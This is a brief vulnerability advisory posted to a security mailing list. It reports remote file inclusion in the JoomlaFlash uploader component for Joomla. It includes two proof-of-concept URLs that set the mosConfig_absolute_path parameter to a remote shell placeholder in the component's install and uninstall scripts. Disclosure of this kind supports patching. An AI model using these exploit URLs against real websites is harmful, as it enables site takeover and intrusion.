JoomlaFlash Component Multiple Remote File Inclusion

From: Smasher@ciucciamiilcalzino.it
To: bugtraq@securityfocus.com
Cc:
Subject: JoomlaFlash Component Multiple Remote File Inclusion
Date:


Autore: Smasher
Sito: http://warwolfz.altervista.org
Tipo: Remote File Inclusion
Rischio: Alto

A remote attacker can gain access to your website throug a Remote shell inclusion.

PoC available:

http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

Regards.
Smasher





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.